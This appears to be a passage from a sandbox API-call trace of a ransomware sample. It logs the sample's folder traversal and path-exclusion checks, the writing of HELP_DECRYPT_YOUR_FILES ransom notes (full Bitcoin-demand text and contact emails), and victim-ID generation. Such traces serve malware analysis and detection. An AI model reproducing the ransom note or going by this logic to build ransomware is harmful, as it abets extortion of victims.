	[0179.824] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\*.*") returned 30
	[0179.825] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.825] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\*.*", cchLength=0x1e | out: lpsz="c:\\users\\default\\favorites\\*.*") returned 0x1e
	[0179.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.825] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="windows") returned 0x0
	[0179.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.825] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="boot") returned 0x0
	[0179.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.826] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="system volume information") returned 0x0
	[0179.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.826] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.826] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="temp") returned 0x0
	[0179.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.826] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="program files") returned 0x0
	[0179.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.827] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.827] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="appdata") returned 0x0
	[0179.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.827] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="application data") returned 0x0
	[0179.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.828] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="winnt") returned 0x0
	[0179.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.828] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="tmp") returned 0x0
	[0179.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.828] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="cache") returned 0x0
	[0179.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.835] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.835] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="webcache") returned 0x0
	[0179.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.835] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="inetcache") returned 0x0
	[0179.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.836] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="nvidia") returned 0x0
	[0179.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.836] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="packages") returned 0x0
	[0179.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.836] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="cookies") returned 0x0
	[0179.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.837] StrStrW (lpFirst="c:\\users\\default\\favorites\\*.*", lpSrch="programdata") returned 0x0
	[0179.837] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0179.837] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0179.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84b620de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.837] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0179.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b620de, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84b620de, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84b620de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b15d13, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84b15d13, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84b620de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.837] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b15d13, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x84b15d13, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x84b620de, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0179.837] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0179.838] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0179.838] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x847f4e3c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x847f4e3c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8481b0c8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0179.838] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x847f4e3c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x847f4e3c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x847f4e3c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0179.838] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1
	[0179.838] lstrcmpW (lpString1="Links", lpString2="..") returned 1
	[0179.838] lstrcmpW (lpString1="Links", lpString2=".") returned 1
	[0179.838] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default"
	[0179.839] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\"
	[0179.839] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links"
	[0179.839] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links"
	[0179.839] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\"
	[0179.839] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\Default\\Links\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\"
	[0179.839] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*"
	[0179.839] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*" (normalized: "c:\\users\\default\\links\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.840] lstrlenW (lpString="C:\\Users\\Default\\Links\\*.*") returned 26
	[0179.840] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.840] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Links\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\default\\links\\*.*") returned 0x1a
	[0179.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.840] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="windows") returned 0x0
	[0179.840] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.841] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="boot") returned 0x0
	[0179.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.841] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0179.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.841] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.841] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="temp") returned 0x0
	[0179.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.842] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="program files") returned 0x0
	[0179.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.842] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.842] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="appdata") returned 0x0
	[0179.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.843] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="application data") returned 0x0
	[0179.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.843] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="winnt") returned 0x0
	[0179.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.843] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="tmp") returned 0x0
	[0179.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.843] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="cache") returned 0x0
	[0179.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.844] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="temporary internet files") returned 0x0
	[0179.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.844] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="webcache") returned 0x0
	[0179.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.846] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0179.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.846] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0179.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.846] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="packages") returned 0x0
	[0179.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.847] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="cookies") returned 0x0
	[0179.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.847] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="programdata") returned 0x0
	[0179.847] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0179.847] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0179.847] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0179.848] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0179.848] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\Default\\Links" | out: lpString1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links"
	[0179.848] lstrcatW (in: lpString1="C:\\Users\\Default\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Links\\*.*") returned="C:\\Users\\Default\\Links\\*.*"
	[0179.848] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.848] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.849] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.TXT") returned 50
	[0179.849] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.849] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0179.849] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0179.852] CloseHandle (hObject=0x380) returned 1
	[0179.852] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.852] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.852] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0179.854] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0179.854] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.854] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0179.854] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0179.854] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0179.854] CloseHandle (hObject=0x380) returned 1
	[0179.867] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0179.867] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0179.868] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0179.868] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.HTML") returned 51
	[0179.868] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.870] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0179.870] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0179.873] CloseHandle (hObject=0x380) returned 1
	[0179.873] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.873] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0179.874] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0179.874] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0179.876] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.876] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0179.876] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0179.876] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0179.877] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0179.877] CloseHandle (hObject=0x380) returned 1
	[0179.877] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*.*" (normalized: "c:\\users\\default\\links\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x84bd4b91, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0179.877] lstrlenW (lpString="C:\\Users\\Default\\Links\\*.*") returned 26
	[0179.877] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.878] CharLowerBuffW (in: lpsz="C:\\Users\\Default\\Links\\*.*", cchLength=0x1a | out: lpsz="c:\\users\\default\\links\\*.*") returned 0x1a
	[0179.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.878] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="windows") returned 0x0
	[0179.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.878] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="boot") returned 0x0
	[0179.878] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.879] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0179.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.879] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0179.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.879] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="temp") returned 0x0
	[0179.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.880] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="program files") returned 0x0
	[0179.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.880] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0179.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.880] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="appdata") returned 0x0
	[0179.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.881] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="application data") returned 0x0
	[0179.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.881] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="winnt") returned 0x0
	[0179.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.881] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="tmp") returned 0x0
	[0179.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.882] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="cache") returned 0x0
	[0179.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.882] StrStrW (lpFirst="c:\\users\\default\\links\\*.*", lpSrch="temporary internet files") returned 0x0
